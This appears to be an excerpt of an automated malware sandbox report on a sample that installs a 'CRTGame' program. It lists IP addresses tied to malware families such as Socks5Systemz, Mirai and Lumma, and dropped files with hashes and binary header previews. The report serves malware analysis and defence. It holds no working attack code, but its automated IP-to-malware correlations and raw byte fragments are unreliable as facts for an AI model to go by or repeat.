                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 174
                                                    • Number of non-executed functions: 243
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    TimeTypeDescription
                                                    21:07:38API Interceptor547884x Sleep call for process: crtgame.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    46.8.225.74j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                      94.232.249.187j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsj9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                        • 46.8.225.74
                                                        b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                                                        • 109.248.108.147
                                                        reduce.exeGet hashmaliciousGO BackdoorBrowse
                                                        • 46.8.236.61
                                                        InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                        • 46.8.236.61
                                                        iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                                                        • 46.8.236.61
                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 46.8.228.104
                                                        file.exeGet hashmaliciousCryptbotBrowse
                                                        • 46.8.237.112
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                        • 46.8.237.112
                                                        file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 46.8.237.112
                                                        Week11.exeGet hashmaliciousGO BackdoorBrowse
                                                        • 46.8.236.61
                                                        INT-PDN-STE-ASSTEPDNInternalASSYj9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                        • 94.232.249.187
                                                        jade.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 31.9.99.97
                                                        jade.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 95.212.143.36
                                                        jade.x86.elfGet hashmaliciousMiraiBrowse
                                                        • 31.14.164.17
                                                        Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 95.212.143.56
                                                        la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                        • 178.171.212.67
                                                        home.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 188.247.2.172
                                                        home.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 46.57.220.121
                                                        f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                        • 77.44.150.37
                                                        teste.arm5.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                        • 46.213.226.219
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                          SecuriteInfo.com.Win32.Malware-gen.2354.25353.exeGet hashmaliciousUnknownBrowse
                                                            SecuriteInfo.com.Win32.Malware-gen.2354.25353.exeGet hashmaliciousUnknownBrowse
                                                              SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                                                SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                                                  SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                                    SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                                      SecuriteInfo.com.Win32.Malware-gen.18181.11360.exeGet hashmaliciousUnknownBrowse
                                                                        SecuriteInfo.com.Win32.Malware-gen.18181.11360.exeGet hashmaliciousUnknownBrowse
                                                                          SecuriteInfo.com.Trojan.GenericKD.72075407.22055.29849.exeGet hashmaliciousUnknownBrowse
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):337408
                                                                            Entropy (8bit):6.515131904432587
                                                                            Encrypted:false
                                                                            SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                            MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                            SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                            SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                            SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: j9htknb7BQ.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.18181.11360.exe, Detection: malicious, Browse
                                                                            • Filename: SecuriteInfo.com.Trojan.GenericKD.72075407.22055.29849.exe, Detection: malicious, Browse
                                                                            Reputation:high, very likely benign file
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):26526
                                                                            Entropy (8bit):4.600837395607617
                                                                            Encrypted:false
                                                                            SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                            MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                            SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                            SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                            SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                            Malicious:false
                                                                            Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):214016
                                                                            Entropy (8bit):6.676457645865373
                                                                            Encrypted:false
                                                                            SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                            MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                            SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                            SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                            SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):266254
                                                                            Entropy (8bit):6.343813822604148
                                                                            Encrypted:false
                                                                            SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                            MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                            SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                            SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                            SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):906766
                                                                            Entropy (8bit):6.450201653594769
                                                                            Encrypted:false
                                                                            SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                            MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                            SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                            SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                            SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):127669
                                                                            Entropy (8bit):7.952352167575405
                                                                            Encrypted:false
                                                                            SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                            MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                            SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                            SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                            SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):149845
                                                                            Entropy (8bit):7.893881970959476
                                                                            Encrypted:false
                                                                            SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                            MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                            SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                            SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                            SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):34392
                                                                            Entropy (8bit):7.81689943223162
                                                                            Encrypted:false
                                                                            SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                            MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                            SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                            SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                            SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5960
                                                                            Entropy (8bit):5.956401374574174
                                                                            Encrypted:false
                                                                            SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                            MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                            SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                            SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                            SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):7910
                                                                            Entropy (8bit):6.931925007191986
                                                                            Encrypted:false
                                                                            SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                            MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                            SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                            SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                            SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):11532
                                                                            Entropy (8bit):7.219753259626605
                                                                            Encrypted:false
                                                                            SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                            MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                            SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                            SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                            SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):39304
                                                                            Entropy (8bit):7.819409739152795
                                                                            Encrypted:false
                                                                            SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                            MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                            SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                            SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                            SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18966
                                                                            Entropy (8bit):7.620111275837424
                                                                            Encrypted:false
                                                                            SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                            MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                            SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                            SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                            SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8456
                                                                            Entropy (8bit):6.767152008521429
                                                                            Encrypted:false
                                                                            SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                            MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                            SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                            SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                            SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):36752
                                                                            Entropy (8bit):7.780431937344781
                                                                            Encrypted:false
